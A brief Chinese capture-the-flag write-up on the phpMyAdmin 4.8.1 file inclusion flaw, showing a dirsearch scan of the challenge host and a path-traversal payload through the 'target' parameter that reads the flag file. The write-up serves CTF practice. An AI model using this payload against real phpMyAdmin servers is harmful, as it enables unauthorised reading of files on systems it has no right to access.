phpmyadmin4.8.1文件包含漏洞
前言
做题
dirsearch.py扫一下
python dirsearch.py -u http://f76e7378-d115-4cc5-a7af-5e388cc892bf.node3.buuoj.cn/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429
扫到了phpmyadmin和phpinfo.php,先进去phpinfo.php没发现什么东西,再进去phpmyadmin,然后看了一下,没有表,咋回事,也没啥提示了
55555,菜死
看了wp才知道4.8.1的phpmyadmin存在文件包含漏洞,该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。
payload:
phpmyadmin/index.php?target=db_datadict.php?../../../../../../../flag
